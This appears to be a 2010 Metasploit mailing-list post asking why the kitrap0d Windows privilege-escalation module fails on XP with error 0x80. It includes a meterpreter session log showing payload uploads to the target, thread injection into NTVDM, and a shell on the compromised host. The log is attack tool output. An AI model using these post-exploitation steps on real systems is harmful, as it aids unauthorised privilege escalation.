Metasploit mailing list archives

kitrap0d - failing on XP 0x80


From: troy () defendit com au
Date: Sat, 24 Apr 2010 18:21:16 +1000 (EST)

Hi all,

kitrap0d is failing against Windows XP 5.1.2600 with:

The exploit thread returned an unexpected error, 0x80

Has anybody seen this? Workarounds?

meterpreter > run kitrap0d
[*] Currently running as PC\IWAM_PC

[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\WINDOWS\TEMP\JwMZeiWrLM.exe...
[*] Uploading vdmallowed to C:\WINDOWS\TEMP\vdmexploit.dll...
[*] Escalating our process (PID:396)...

--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso () sdf lonestar org ---


[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntoskrnl.exe@804D4000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x3bd0c bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 2008
[?] OpenProcess(2008) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7d8, INFINITE);
[?] GetExitCodeThread(0x7d8, 0012FF44); => 0x80
[!] The exploit thread returned an unexpected error, 0x80

[*] Deleting files...
[*] Now running as PC\IWAM_PC


meterpreter > shell
Process 336 created.
Channel 7 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


Thanks!!


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

